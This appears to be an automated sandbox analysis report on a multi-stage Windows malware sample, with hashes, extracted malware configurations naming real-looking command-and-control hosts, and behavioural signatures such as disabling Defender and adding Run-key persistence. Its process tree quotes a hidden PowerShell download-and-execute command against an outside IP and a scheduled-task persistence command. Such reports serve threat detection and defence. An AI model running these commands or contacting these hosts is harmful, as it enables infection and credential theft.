Analysis
max time kernel: 150s
max time network: 151s
platform: windows10-2004_x64
resource: win10v2004-20250314-en
resource tags: arch:x64, arch:x86, image:win10v2004-20250314-en, locale:en-us, os:windows10-2004-x64, system
submitted: 30/03/2025, 13:34
Static task: static1
Behavioral task: behavioral1
Sample: 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource: win7-20240903-en
Behavioral task: behavioral2
Sample: 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Resource: win10v2004-20250314-en
General
Target: 2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe
Size: 938KB
MD5: 0be1d68cb52990f41a783f9b0aba5fc8
SHA1: 7823839d432aad2877d8c2ef4f664b209cbc71ba
SHA256: a5b959ac59961099a0605032aad6ad96ed577cfe8283bab41acc1efc8a00a1e4
SHA512: 5347dafacf19ef7437ad2730ecf7ab522b870779989e686d91e918ec3424cf35739e7ee32dca09d86894b3c783195c0c72e12ed70e6099f698efdfbbca8e71e4
SSDEEP: 24576:mqDEvCTbMWu7rQYlBQcBiT6rprG8a41u:mTvC/MTQYxsWR7a41
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
install_dir: bb556cff4a
install_file: rapes.exe
strings_key: a131b127e996a898cd19ffb2d92e481b
url_paths: /Ni9kiput/index.php
Extracted
quasar
1.5.0
Office04
goku92ad.zapto.org:5000
a0766e5c-a1d1-4766-a1f5-4e4f9f9fe35a
encryption_key: BF72099FDBC6B48816529089CF1CF2CF86357D14
install_name: Client.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Quasar Modded Client Startup
subdirectory: SubDir
Extracted
lumma
Extracted
stealc
trump
http://45.93.20.28
url_path: /85a1cacf11314eb8.php
Signatures
Amadey family
Detect Xworm Payload 2 IoCs
resource | yara_rule
behavioral2/files/0x00080000000242b6-424.dat | family_xworm
behavioral2/memory/1348-437-0x00000000009F0000-0x0000000000A18000-memory.dmp | family_xworm
Detects Healer an antivirus disabler dropper 3 IoCs
resource | yara_rule
behavioral2/memory/5460-752-0x0000000000850000-0x0000000000CAE000-memory.dmp | healer
behavioral2/memory/5460-756-0x0000000000850000-0x0000000000CAE000-memory.dmp | healer
behavioral2/memory/5460-1284-0x0000000000850000-0x0000000000CAE000-memory.dmp | healer
Healer family
Lumma family
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" | ae9ab2f9a7.exe
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection | ae9ab2f9a7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" | ae9ab2f9a7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" | ae9ab2f9a7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" | ae9ab2f9a7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" | ae9ab2f9a7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" | ae9ab2f9a7.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | ae9ab2f9a7.exe
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications | ae9ab2f9a7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" | ae9ab2f9a7.exe
Modifies security service 2 TTPs 2 IoCs
description | ioc | Process
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Parameters | reg.exe
Key deleted | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wscsvc\Security | reg.exe
Quasar family
Quasar payload 2 IoCs
resource | yara_rule
behavioral2/memory/1696-121-0x000000000C850000-0x000000000C9A4000-memory.dmp | family_quasar
behavioral2/memory/1696-122-0x000000000C9D0000-0x000000000C9EA000-memory.dmp | family_quasar
Stealc family
Xworm family
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 15 IoCs
description | ioc | Process
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 2983c11b74.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 05be0399a2.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 0af0a2f978.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 1310185143.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 88e128475c.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | ae9ab2f9a7.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 50981a7f32.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | e2a57b0b34.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | e9ea3a76fa.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | 8ffa067850.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ | rapes.exe
Blocklisted process makes network request 6 IoCs
flow | pid | Process
14 | 3004 | powershell.exe
51 | 1696 | powershell.exe
63 | 1696 | powershell.exe
129 | 1696 | powershell.exe
255 | 1696 | powershell.exe
376 | 1696 | powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs
Run Powershell and hide display window.
pid | Process
3004 | powershell.exe
1696 | powershell.exe
1496 | PowerShell.exe
5056 | powershell.exe
2084 | powershell.exe
4684 | powershell.exe
2148 | powershell.exe
2692 | powershell.exe
5640 | powershell.exe
6348 | powershell.exe
1300 | powershell.exe
1456 | powershell.exe
Creates new service(s) 2 TTPs
Downloads MZ/PE file 17 IoCs
flow | pid | Process
139 | 2324 | rapes.exe
139 | 2324 | rapes.exe
139 | 2324 | rapes.exe
14 | 3004 | powershell.exe
124 | 4324 | futors.exe
136 | 4324 | futors.exe
90 | 4324 | futors.exe
245 | 4324 | futors.exe
245 | 4324 | futors.exe
109 | 4324 | futors.exe
319 | 2324 | rapes.exe
391 | 2324 | rapes.exe
29 | 2324 | rapes.exe
29 | 2324 | rapes.exe
76 | 2324 | rapes.exe
76 | 2324 | rapes.exe
76 | 2324 | rapes.exe
Possible privilege escalation attempt 4 IoCs
pid | Process
3476 | takeown.exe
4568 | icacls.exe
4308 | takeown.exe
4320 | icacls.exe
Sets service image path in registry 2 TTPs 1 IoCs
Stops running service(s) 4 TTPs
.NET Reactor protector 2 IoCs
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
resource | yara_rule
behavioral2/files/0x00080000000242b6-424.dat | net_reactor
behavioral2/memory/1348-437-0x00000000009F0000-0x0000000000A18000-memory.dmp | net_reactor
Checks BIOS information in registry 2 TTPs 30 IoCs
BIOS information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 8ffa067850.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 0af0a2f978.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 50981a7f32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 1310185143.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | e9ea3a76fa.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | e9ea3a76fa.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 2983c11b74.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 88e128475c.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | ae9ab2f9a7.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 2983c11b74.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 05be0399a2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | ae9ab2f9a7.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 50981a7f32.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | e2a57b0b34.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 1310185143.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 0af0a2f978.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 8ffa067850.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | e2a57b0b34.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | 88e128475c.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | 05be0399a2.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | rapes.exe
Checks computer location settings 2 TTPs 16 IoCs
Looks up country code configured in the registry, likely geofence.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | rapes.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | 7d5ce09794.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | 221.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | 221.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | futors.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | NP4kBrG.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | 221.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | 221.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | Bell_Setup16.tmp
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | A9cowK5.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | mshta.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | A9cowK5.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | apple.exe
Key value queried | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Control Panel\International\Geo\Nation | amnew.exe
Drops startup file 4 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2789eb1e.cmd | powershell.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\StartupScript_2789eb1e.cmd | powershell.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk | NP4kBrG.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.lnk | NP4kBrG.exe
Event Triggered Execution: Component Object Model Hijacking 1 TTPs
Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects.
Executes dropped EXE 52 IoCs
pid | Process
1656 | TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
2324 | rapes.exe
1040 | rapes.exe
972 | 7d5ce09794.exe
2512 | 221.exe
3856 | 221.exe
2544 | A9cowK5.exe
212 | kO2IdCz.exe
4028 | apple.exe
2252 | 221.exe
2148 | 221.exe
3752 | amnew.exe
4324 | futors.exe
4384 | ScreenConnect.ClientService.exe
4728 | ScreenConnect.WindowsClient.exe
4196 | ScreenConnect.WindowsClient.exe
2880 | e9ea3a76fa.exe
1332 | gron12321.exe
1348 | NP4kBrG.exe
2824 | v7942.exe
4912 | rapes.exe
3368 | futors.exe
1764 | alex1dskfmdsf.exe
4268 | 2983c11b74.exe
3968 | smss.exe
2856 | Bell_Setup16.exe
4028 | Bell_Setup16.tmp
3196 | Bell_Setup16.exe
2512 | Bell_Setup16.tmp
2856 | 05be0399a2.exe
444 | 7ef3f93a66.exe
5460 | ae9ab2f9a7.exe
5192 | bot.exe
6312 | bot.exe
6660 | 0af0a2f978.exe
7060 | 50981a7f32.exe
5824 | 389dc2db95.exe
6500 | svchost015.exe
6540 | 8ffa067850.exe
6712 | svchost015.exe
2532 | e2a57b0b34.exe
5980 | e269e6c0d6.exe
4008 | svchost015.exe
6288 | 1310185143.exe
7012 | svchost015.exe
7088 | 842890bd89.exe
5460 | 88e128475c.exe
6736 | A9cowK5.exe
6140 | rapes.exe
3268 | futors.exe
7060 | EPTwCQd.exe
4700 | smss.exe
Identifies Wine through registry keys 2 TTPs 15 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as a sandboxing environment.
description | ioc | Process
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | 2983c11b74.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | 1310185143.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | ae9ab2f9a7.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | 8ffa067850.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | e2a57b0b34.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | 88e128475c.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | e9ea3a76fa.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | 05be0399a2.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | 0af0a2f978.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | 50981a7f32.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | rapes.exe
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
Key opened | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Wine | rapes.exe
Loads dropped DLL 34 IoCs
pid | Process
4840 | MsiExec.exe
4568 | rundll32.exe
4568 | rundll32.exe
4568 | rundll32.exe
4568 | rundll32.exe
4568 | rundll32.exe
4568 | rundll32.exe
4568 | rundll32.exe
4568 | rundll32.exe
4568 | rundll32.exe
4320 | MsiExec.exe
4128 | MsiExec.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
4384 | ScreenConnect.ClientService.exe
3468 | regsvr32.exe
5988 | MsiExec.exe
3220 | rundll32.exe
3220 | rundll32.exe
3220 | rundll32.exe
3220 | rundll32.exe
3220 | rundll32.exe
3220 | rundll32.exe
3220 | rundll32.exe
3220 | rundll32.exe
3220 | rundll32.exe
4976 | MsiExec.exe
Modifies file permissions 1 TTPs 4 IoCs
pid | Process
3476 | takeown.exe
4568 | icacls.exe
4308 | takeown.exe
4320 | icacls.exe
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
Windows security modification 2 TTPs 2 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features | ae9ab2f9a7.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" | ae9ab2f9a7.exe
Adds Run key to start application 2 TTPs 7 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ae9ab2f9a7.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381480101\\ae9ab2f9a7.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\e269e6c0d6.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10045220101\\e269e6c0d6.exe" | futors.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | kO2IdCz.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\smss = "C:\\Users\\Admin\\AppData\\Local\\Temp\\smss.exe" | NP4kBrG.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\2983c11b74.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381450101\\2983c11b74.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\05be0399a2.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381460101\\05be0399a2.exe" | rapes.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\7ef3f93a66.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10381470101\\7ef3f93a66.exe" | rapes.exe
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/files/0x00080000000242d8-699.dat | autoit_exe
Boot or Logon Autostart Execution: Authentication Package 1 TTPs 1 IoCs
Suspicious Windows Authentication Registry Modification.
description | ioc | Process
Set value (data) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Lsa\Authentication Packages = 6d007300760031005f003000000043003a005c00500072006f006700720061006d002000460069006c00650073002000280078003800360029005c00530063007200650065006e0043006f006e006e00650063007400200043006c00690065006e00740020002800660036003300610038003200660066006100660039006600390033006400310029005c00530063007200650065006e0043006f006e006e006500630074002e00570069006e0064006f0077007300410075007400680065006e007400690063006100740069006f006e005000610063006b006100670065002e0064006c006c0000000000 | msiexec.exe
Drops file in System32 directory 3 IoCs
description | ioc | Process
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log | ScreenConnect.WindowsClient.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\ukozrnyo.tmp | ScreenConnect.ClientService.exe
File created | C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (f63a82ffaf9f93d1)\ukozrnyo.newcfg | ScreenConnect.ClientService.exe
Suspicious use of NtSetInformationThreadHideFromDebugger 15 IoCs
pid | Process
1656 | TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE
2324 | rapes.exe
1040 | rapes.exe
2880 | e9ea3a76fa.exe
4912 | rapes.exe
4268 | 2983c11b74.exe
2856 | 05be0399a2.exe
5460 | ae9ab2f9a7.exe
6660 | 0af0a2f978.exe
7060 | 50981a7f32.exe
6540 | 8ffa067850.exe
2532 | e2a57b0b34.exe
6288 | 1310185143.exe
5460 | 88e128475c.exe
6140 | rapes.exe
Suspicious use of SetThreadContext 8 IoCs
description | pid | Process | procid_target
PID 1332 set thread context of 3004 | 1332 | gron12321.exe | 288
PID 1764 set thread context of 444 | 1764 | alex1dskfmdsf.exe | 308
PID 7060 set thread context of 6500 | 7060 | 50981a7f32.exe | 359
PID 6540 set thread context of 6712 | 6540 | 8ffa067850.exe | 361
PID 2532 set thread context of 4008 | 2532 | e2a57b0b34.exe | 364
PID 6288 set thread context of 7012 | 6288 | 1310185143.exe | 366
PID 7088 set thread context of 6892 | 7088 | 842890bd89.exe | 372
PID 7060 set thread context of 4340 | 7060 | EPTwCQd.exe | 382
Drops file in Program Files directory 64 IoCs
Drops file in Windows directory 17 IoCs
Launches sc.exe 64 IoCs
Sc.exe is a Windows utility to control services on the system.
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
Checks SCSI registry key(s) 3 TTPs 5 IoCs
SCSI information is often read in order to detect sandboxing environments.
Checks processor information in registry 2 TTPs 20 IoCs
Processor information is often read in order to detect sandboxing environments.
Delays execution with timeout.exe 2 IoCs
pid Process
3208 timeout.exe
5012 timeout.exe
Kills process with taskkill 5 IoCs
pid Process
4368 taskkill.exe
3368 taskkill.exe
3032 taskkill.exe
2004 taskkill.exe
1952 taskkill.exe
Modifies data under HKEY_USERS 15 IoCs
Modifies registry class 40 IoCs
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process
3468 schtasks.exe
4368 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process
1696 powershell.exe
Suspicious behavior: EnumeratesProcesses 64 IoCs
Suspicious behavior: LoadsDriver 4 IoCs
pid Process
664 Process not Found
664 Process not Found
664 Process not Found
664 Process not Found
Suspicious use of AdjustPrivilegeToken 64 IoCs
Suspicious use of FindShellTrayWindow 37 IoCs
Suspicious use of SendNotifyMessage 26 IoCs
Suspicious use of SetWindowsHookEx 2 IoCs
pid Process
1348 NP4kBrG.exe
3440 firefox.exe
Suspicious use of WriteProcessMemory 64 IoCs
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-03-30_0be1d68cb52990f41a783f9b0aba5fc8_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1180 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Sl6W2masdNy /tr "mshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Sl6W2masdNy /tr "mshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:3468
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\fZkhgKZa4.hta2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4872
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'PVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:3004
C:\Users\Admin\AppData\Local\TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE"C:\Users\Admin\AppData\Local\TempPVHHTNPRDVAAH2JVKPUGUID195KPTH5W.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1656
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2324
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10373951121\5YB5L4K.cmd"6⤵
- Suspicious use of WriteProcessMemory
PID:2448
